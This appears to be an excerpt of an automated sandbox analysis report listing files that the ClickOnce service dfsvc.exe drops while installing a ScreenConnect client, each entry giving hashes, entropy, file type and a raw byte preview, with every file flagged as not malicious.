                                                                                                                                                                              Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 4770 bytes, 1 file, at 0x2c +A "disallowedcert.stl", number 1, 1 datablock, 0x1 compression
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):4770
                                                                                                                                                                              Entropy (8bit):7.946747821604857
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:96:9/nBu64pydcvOHRUfu0xK1bQYMRSRNoYmxYvk56sHMZhh4m:9/nBuP2cGxUfu6K1bpWJ6vfh4m
                                                                                                                                                                              MD5:1BFE591A4FE3D91B03CDF26EAACD8F89
                                                                                                                                                                              SHA1:719C37C320F518AC168C86723724891950911CEA
                                                                                                                                                                              SHA-256:9CF94355051BF0F4A45724CA20D1CC02F76371B963AB7D1E38BD8997737B13D8
                                                                                                                                                                              SHA-512:02F88DA4B610678C31664609BCFA9D61DB8D0B0617649981AF948F670F41A6207B4EC19FECCE7385A24E0C609CBBF3F2B79A8ACAF09A03C2C432CC4DCE75E9DB
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:MSCF............,...................O.................2Wqh .disallowedcert.stl....^K...CK.wTS...:.w.K'.C0T.....Bh.{....C.).*.....Y@...(..).R."E..D^6........u....|f~3...o.3. ..SPK.k.o#...."{-.U..P........:..aPr.@.d......Dy.h.....)..:...!./\A.....A<I_<$...q.h..........'.....7....H...@`T..K.S.%...Y4..R.....`.....-....D...(..b..-c."...G.=.dx..S+..2.a.E....d.L...77J...c.[..@..iT&..^78..g....NW6.Ek..FY.F........cNt.O.*..R....*......D...... k........J.y...z.d...;.9_t...].@....yw..}.x....d.t..`f\K..;|.*h.X...4/.;.xT......q>.0...<...3...X..L$.&.,b.....\V....\......G..O..@..H3.....t..J..).x.?.{[..G>.7...<...^Q..z..Gw9P..d....i].n%K}.*z..2.Py...A..s...z..@...4..........4.....*Y.d..._Z.5.s..fl.C..#.K{9^.E...k..z.Ma..G.(.....5g. ...}.t.#4....$;.,....S@fs....k......u .^2.#_...I........;.......w..P...UCY...$;.S._|.x..dK...[i..q..^.l..A.?.....'N.. .L.l......m.*.+f#]............A.;.....Z..rIt....RW....Kr1e=8.=.z:Oi.z.d..r..C_......o...]j.N;.s....3@3.dgrv.
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):71954
                                                                                                                                                                              Entropy (8bit):7.996617769952133
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                                                                                                              MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                                                                                                              SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                                                                                                              SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                                                                                                              SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:Certificate, Version=3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1716
                                                                                                                                                                              Entropy (8bit):7.596259519827648
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:48:GL3d+gG48zmf8grQcPJ27AcYG7i47V28Tl4JZG0FWk8ZHJ:GTd0PmfrrQG28cYG28CEJ
                                                                                                                                                                              MD5:D91299E84355CD8D5A86795A0118B6E9
                                                                                                                                                                              SHA1:7B0F360B775F76C94A12CA48445AA2D2A875701C
                                                                                                                                                                              SHA-256:46011EDE1C147EB2BC731A539B7C047B7EE93E48B9D3C3BA710CE132BBDFAC6B
                                                                                                                                                                              SHA-512:6D11D03F2DF2D931FAC9F47CEDA70D81D51A9116C1EF362D67B7874F91BF20915006F7AF8ECEBAEA59D2DC144536B25EA091CC33C04C9A3808EEFDC69C90E816
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:0...0............@.`.L.^.....0...*.H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40...210429000000Z..360428235959Z0i1.0...U....US1.0...U....DigiCert, Inc.1A0?..U...8DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA10.."0...*.H.............0........./B.(.x.].9Y...B.3..=..p..&0...h.\..4$..KO.xC........g.RO..W.......>Mp$d....}4}L.W.kC....;....GZ..L.. %............e....I5.=Q..!xE...,.......IpB2......eh..ML..HRh....W]...e...O.,H.V.5........7.....|...2........t..9..`.....1.......#GG...n..m.....jg-.D......;...2Z..j`T.I....\.o.&....8........o.a4\..E(.6*f(_.s.&%....\...L.b.^3........+..6y.....u.e..HP.w....P.F.aX..|..<.(.9....S..G.u0..0.v..[K]taM?..v.X.r.)A...m&vh.A.X..&+..MY.x.J>@G_.Ps..#!Y`.dT..!..8.|f..x8E0.O.cOL....SA|X=G....2...l<.V.........Y0..U0...U.......0.......0...U......h7..;._....a{..e.NB0...U.#..0.......q]dL..g?....O0...U...........0...U.%..0...+.......0w..+........k0i0$..+.....0...http:/
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):727
                                                                                                                                                                              Entropy (8bit):7.591493461244967
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12:5onfZGyc5RlRtBfQgyusAO+NEg3xO/MwGE2Mqyry/oUp2nWmyJQLYC0pH:5ikycdZNyuIJ/ZG7MqyryEnWNJQL8H
                                                                                                                                                                              MD5:85E4EF53DAF9D74A4F483E3575E0182E
                                                                                                                                                                              SHA1:706B05F30E9CA50CAA4D2AB06EEBDE684094F9F8
                                                                                                                                                                              SHA-256:A155EDDD3FEFEB549E9A57DF0FE3910F7F66CF43E310DC81FC4A59E2E9529AF4
                                                                                                                                                                              SHA-512:69E9854A575CE93964777B31CAEA6167A4291C57482BD342731BB02F04BE93450694A75C7BA019EAD54F38F25DFB96263111BA33A1DB57F77E25CF8EE681F007
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:0..........0.....+.....0......0...0..........q]dL..g?....O..20241106184215Z0s0q0I0...+........."..;F..=\@ua..........q]dL..g?....O....@.`.L.^........20241106184215Z....20241113184215Z0...*.H.............|Q..V'.v..K..x.......i.f...&.!..........w9........./. ..G.7...NB..=..o..v...R...G.t!>..q.....d..V...C.*..3...l.+.9z.[....8.w..>......._..4D..X.(....oa...`K..U~.t./`I.p4..o.d\i$...Q......&.E.r,....kT..~R.w.Q..@.Bb...X.|....$I....gy6........p..f.ns.1..W{.;.....AldY.F.8I...3.K.D.!.@....2d#......LK..I.....|...#.p.....K?.....?..C.w..`...G.G.....7..zl....}...^ S.$..h..B5V..FI......T..p.*7.?..f.R5. P.*.[.|..S...^.....zK;.@.*X7.<~..X.8;..Q...t".K.yg..].+...0(.b{. 1.....'.^..q..6.PE;.....
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:Certificate, Version=3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1428
                                                                                                                                                                              Entropy (8bit):7.688784034406474
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24:nIGWnSIGWnSGc9VIyy0KuiUQ+7n0TCDZJCCAyuIqwmCFUZnPQ1LSdT:nIL7LJSRQ+QgAyuxwfynPQmR
                                                                                                                                                                              MD5:78F2FCAA601F2FB4EBC937BA532E7549
                                                                                                                                                                              SHA1:DDFB16CD4931C973A2037D3FC83A4D7D775D05E4
                                                                                                                                                                              SHA-256:552F7BDCF1A7AF9E6CE672017F4F12ABF77240C78E761AC203D1D9D20AC89988
                                                                                                                                                                              SHA-512:BCAD73A7A5AFB7120549DD54BA1F15C551AE24C7181F008392065D1ED006E6FA4FA5A60538D52461B15A12F5292049E929CFFDE15CC400DEC9CDFCA0B36A68DD
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:0...0..x..........W..!2.9...wu\0...*.H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40...130801120000Z..380115120000Z0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40.."0...*.H.............0..........sh..]J<0"0i3..%..!=..Y..).=X.v..{....0....8..V.m...y....._..<R.R....~...W.YUr.h.p..u.js2...D.......t;mq.-... .. .c)-..^N..!a.4...^.[......4@_.zf.w.H.fWW.TX..+.O.0.V..{]..O^.5.1..^......@.y.x...j.8.....7...}...>..p.U.A2...s*n..|!L....u]xf.:1D.3@...ZI...g.'..O9..X..$\F.d..i.v.v=Y]Bv...izH....f.t..K...c....:.=...E%...D.+~....am.3...K...}....!........p,A`..c.D..vb~.....d.3....C....w.....!..T)%.l..RQGt.&..Au.z._.?..A..[..P.1..r."..|Lu?c.!_. Qko....O..E_. ........~.&...i/..-............B0@0...U.......0....0...U...........0...U..........q]dL..g?....O0...*.H..............a.}.l.........dh.V.w.p...J...x\.._...)V.6I]Dc...f.#.=y.mk.T..<.C@..P.R..;...ik.
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):338
                                                                                                                                                                              Entropy (8bit):3.1511889241290114
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:kkFklySkfllXlE/0htlX16pFRltB+SliQlP8F+RlTRe86A+iRlERMta9b3+AL0Wy:kKcLN+SkQlPlEGYRMY9z+s3Ql2DUevat
                                                                                                                                                                              MD5:6AEC57E2CD5E2B11651800442C111D0F
                                                                                                                                                                              SHA1:D51F5CC94D4EE37F170B19012FE7AFB05268FDF5
                                                                                                                                                                              SHA-256:DE737469C770A425CE15BB9BEEDC6F0E795EEB690A259650F9D3631B56C6E0E1
                                                                                                                                                                              SHA-512:B56CF3852678C6C433A32AA870B60C89B982255277D0CB5CEDFB582212E39927C125161A1CEF5FAB7C90F6B6534CB9813547898DADAFD21A15555BC13CDA85EF
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:p...... ........Rm..71..(....................................................... .........p.........$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.d.i.s.a.l.l.o.w.e.d.c.e.r.t.s.t.l...c.a.b...".7.4.6.7.8.7.a.3.f.0.d.9.1.:.0."...
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):328
                                                                                                                                                                              Entropy (8bit):3.1356875516282012
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6:kKBhn9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:Jh2DnLNkPlE99SNxAhUe/3
                                                                                                                                                                              MD5:9EC1A7C691A9739117C6D5947CD89CC4
                                                                                                                                                                              SHA1:BE2AF30594EC1069EBF2D09F62EED519A8253BB5
                                                                                                                                                                              SHA-256:D101754515F2BB215B6F25CA7AD4C4D6B6D69A7C6D492C4CB80B16BAB71928D3
                                                                                                                                                                              SHA-512:CE51FF6EF5E464E9FE7BD87EE38F36F66A9C9A77B0EC5F6D072F71739191DBACCE4DD8022E669CB14C166575827C46C5AD3F1531257794A20C5F341C8A028233
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:p...... ........\...71..(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):308
                                                                                                                                                                              Entropy (8bit):3.206650934253046
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:kkFkld5fllXlE/YXlzX/RDvcalXl+RAIdA31y+NW0y1YboOai2WelVJUTMVDXlVn:kKazNcalgRAOAUSW0P3PeXJUwh8lmi3Y
                                                                                                                                                                              MD5:5EBBEBA66331472351894F7917FC1054
                                                                                                                                                                              SHA1:02600FFD74FB9EB4F9352F211E7A8FF5F115BEF4
                                                                                                                                                                              SHA-256:B14FF8F6728BD04DEA094D37D449CB78B50308C299CD2A4CC92F72E65201CF3C
                                                                                                                                                                              SHA-512:0EE0728C741E30C90171A4D94E13372661A5472B70CA53FD6E3F96E012AA1B0B1E20E74CB8E5F1F217949D43006A2F41D26464584B564A630701433DDD541CDC
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:p...... ........D|..71..(....................................................... ........}.-@@......................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.T.r.u.s.t.e.d.G.4.C.o.d.e.S.i.g.n.i.n.g.R.S.A.4.0.9.6.S.H.A.3.8.4.2.0.2.1.C.A.1...c.r.t...".6.0.9.0.3.0.2.2.-.6.b.4."...
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):412
                                                                                                                                                                              Entropy (8bit):3.9719419467755217
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12:ZbdzmJymxMiv8sFBSfamB3rbFURMOlAkr:ZZzmJymxxv7Sf13rbQJr
                                                                                                                                                                              MD5:DC05D3BB5CEF0F303C9AA8001298EBFD
                                                                                                                                                                              SHA1:F6335D128F532C950793131FDAB34C3F3806B355
                                                                                                                                                                              SHA-256:479C4319655660A990E18565EF948ED2DAD7141CFCD7DE324397CD45D50A6176
                                                                                                                                                                              SHA-512:93086CF888F6526A75810893C1525E5120F64AEEAF8E2EC0A121206CEE7A48365772CB5F6D20EA5D265D9355E10E556414A17D2BDBFA8833AF104C5429C176BA
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:p...... ....(.......71..(.................a.{0....F..5....................F..5.. ........w..11.. ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.T.f.I.s.%.2.B.L.j.D.t.G.w.Q.0.9.X.E.B.1.Y.e.q.%.2.B.t.X.%.2.B.B.g.Q.Q.U.7.N.f.j.g.t.J.x.X.W.R.M.3.y.5.n.P.%.2.B.e.6.m.K.4.c.D.0.8.C.E.A.i.t.Q.L.J.g.0.p.x.M.n.1.7.N.q.b.2.T.r.t.k.%.3.D...
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):254
                                                                                                                                                                              Entropy (8bit):3.0371508354751664
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6:kKW4LDcJgjcalgRAOAUSW0PTKDXMOXISKlUp:FLYS4tWOxSW0PAMsZp
                                                                                                                                                                              MD5:36FFF254C257C91A0A6F098457877389
                                                                                                                                                                              SHA1:D561296284706A2B710820FB60F22D1CCFDC2059
                                                                                                                                                                              SHA-256:4F0C3375FB425279472D370A90DF62ED5D59541F2C472D8B3D48602609FAFEE9
                                                                                                                                                                              SHA-512:3FB8B2841FB6FA11D8D30600ABBF7201DC1EA0D5B815B04C70A2018AC79DBC702F03D1FFE46EBC0360D5F5EA05425E774450523E873C40010338FB20F0B00892
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:p...... ....l...u.k.71..(....................................................... ............n......................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.T.r.u.s.t.e.d.R.o.o.t.G.4...c.r.t...".5.a.2.8.6.4.1.7.-.5.9.4."...
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):25496
                                                                                                                                                                              Entropy (8bit):5.554272896884944
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:768:NsMq26tX9DkX9R/QPI+0m/ZdarinmnOijio:GNDkNzRm/ZAtio
                                                                                                                                                                              MD5:79D5C163F975EFD5CD7BE308E168EA61
                                                                                                                                                                              SHA1:9537B97D818F557654F1DFC4FC494B25FADAAC9D
                                                                                                                                                                              SHA-256:9A31C650388C3695125F99E77571ED4ABAD106F804A6FFF65DFF6888117E0C42
                                                                                                                                                                              SHA-512:5117924069AB2B544E5F44295355F4101C8A1AC21041E089028DFFDD8365218EFBBFB5ADDB30EDE29B7ADDAB754648DBC8F995661C278C67B99D5C8151D3913C
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:PcmH............Q.m.f.......!...T...........................e...?....<.g..J.|r,..`P....}'.d.........8........R....................U.K...W.....U..c...................'-........s".I...R.....$...........3..L.G.......S..{.........6.......'~.x.h.....[...........5...M...8..........~9......-.a:...j.......;...K*...!.<......6..A....y.].m..C....=4.....E....&..{.!.G....qz...#aI...@.R....K....u..IV..N......D..O.....E..X.R...O.&r..VzU......3LD.SY...[s.T..<\...........`.......=...P...S...V...Z...].......,.......L.......T.......\.......`.......|...........................................@.......0...........<.......T.......h.......|...0.......................................0...........<.......T.......h.......|...0.......................................0...........8.......L.......`...0...l.......................................................................,.......8.......L.......`.......l...........................................................................................@...
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (10074), with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):17866
                                                                                                                                                                              Entropy (8bit):5.954687824833028
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:384:ze1oEQwK45aMUf6FX9hJX9FX9R/QPIYM7Y7:zd6FX9hJX9FX9R/QPIN07
                                                                                                                                                                              MD5:1DC9DD74A43D10C5F1EAE50D76856F36
                                                                                                                                                                              SHA1:E4080B055DD3A290DB546B90BCF6C5593FF34F6D
                                                                                                                                                                              SHA-256:291FA1F674BE3CA15CFBAB6F72ED1033B5DD63BCB4AEA7FBC79FDCB6DD97AC0A
                                                                                                                                                                              SHA-512:91E8A1A1AEA08E0D3CF20838B92F75FA7A5F5DACA9AEAD5AB7013D267D25D4BF3D291AF2CA0CCE8B73027D9717157C2C915F2060B2262BAC753BBC159055DBDF
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <asmv1:assemblyIdentity name="ScreenConnect.WindowsClient.exe" version="24.2.10.8991" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" type="win32" />.. <application />.. <entryPoint>.. <assemblyIdentity name="ScreenConnect.WindowsClient" version="24.2.10.8991" publicKeyToken="4B14C015C87C1AD8" language="neutral" processorArchitecture="msil" />.. <commandLine file="ScreenConnect.WindowsClient.exe" paramet
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):3452
                                                                                                                                                                              Entropy (8bit):4.201654981230681
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:48:vIEfBeF7lWuWW+Lg0e6S+9owQX7g27mLKDO2V42WGs5PLahIYX:vJ3uWWWeV+WwQXlmLKDOr2WGs5PmhIYX
                                                                                                                                                                              MD5:82063BE36D595719088C0A4F91637781
                                                                                                                                                                              SHA1:EAC857271A234EEB98CB456234037DA64C6281FD
                                                                                                                                                                              SHA-256:0B0C2C1004D7E2F5F9E0D785395B4B80627E00275D47A555288E49F82CB24D1C
                                                                                                                                                                              SHA-512:A1E22616D939C0A964B5C16A492B84B81AA6D28B2E20F81D31D705BAF13C4F4B2D4CDD3E583B2A7D4D18E015D1480BA50BDAEFACC5C868F74C4153F43BA85FFE
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:PcmH..........s.'...#...(.......T..........................."........<.g..J.|r,..`P..............E..X......U..c...................'-........s".I...R.....$...........3..L.G.....'~.x.h.................z..w.....[~31.X....s)..;$D......B(.........f..VC.........;..........................0...@...0...p...0.......0...................................0.......4.......D.......T.......\...4...h...........P...\...........@...................................,...(...4.......\.......d.......x...(.......................(.......................(...........$...4...,.......`...............................................v...............................................v...............................................v...............................................v...nameScreenConnect.Core%%processorArchitecture%%%msilpublicKeyToken%%4B14C015C87C1AD8version%24.2.10.8991....................................................MdHd............D...........MdSp(...$...(...(...#............... urn:schemas
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1216
                                                                                                                                                                              Entropy (8bit):5.1303806593325705
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24:JdFYZ8h9onR+geP0Au2vSkcVSkcMKzpdciSkTo:3FYZ8h9o4gI0A3GVETDTo
                                                                                                                                                                              MD5:2343364BAC7A96205EB525ADDC4BBFD1
                                                                                                                                                                              SHA1:9CBA0033ACB4AF447772CD826EC3A9C68D6A3CCC
                                                                                                                                                                              SHA-256:E9D6A0964FBFB38132A07425F82C6397052013E43FEEDCDC963A58B6FB9148E7
                                                                                                                                                                              SHA-512:AB4D01B599F89FE51B0FFE58FC82E9BA6D2B1225DBE8A3CE98F71DCE0405E2521FCA7047974BAFB6255E675CD9B3D8087D645B7AD33D2C6B47B02B7982076710
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Core" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Core.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Configuration" publicKeyToken="b03f5f7f11d50a3a" version="2.0.0.0" />.. </dependentAssem
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):5260
                                                                                                                                                                              Entropy (8bit):4.245722747214911
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:96:pNq6R84zeV+Ww7mk9O43jYHlIgBXwmvvL3kuwnjIbm:RR840JC9tUHlXBXJ7ejd
                                                                                                                                                                              MD5:30464BA9FEA77BB280E2A2F58E747D4B
                                                                                                                                                                              SHA1:7E25A846059F877A29B8DB06DF85FD1C8A24159B
                                                                                                                                                                              SHA-256:0E5546EA5D0333B4A8170379D63657E34463089BDBF4417C449DEC1AD6527498
                                                                                                                                                                              SHA-512:B58C6ABD552208CFFC9591415596E5882DFCD5CD0F87E171C02434FF819A5133698A3A953BBB19AD7EE94EA95D7339D59A73F84617685D2E11A0743C5BDE06EB
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:PcmH........i...;.Q4...t.......T...............P...........3........<.g..J.|r,..`P............O.&r..Vz.....U..c...................'-........s".I...R.....$...........3..L.G.....[.......................z..w.....[~31.X....C.........y..&..d......B(.........^.ie...u"...F.....Ey%.....E..X.(...s".I...R)....+.`...m,......;../............... ...#...&...*...-...0...0.......0...D...0...t...0.......0.......0.......0...4...0...d...................................................................4...........4...P...........l...@.......................................(........... .......(...(...<.......d.......l.......|...(.......................(.......................(...........8.......@.......T...(...d...................(.......................(...............d...........p...............................................v...............................................v...............................................v...............................................v.......................
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1982
                                                                                                                                                                              Entropy (8bit):5.057585371364542
                                                                                                                                                                              Encrypted:false
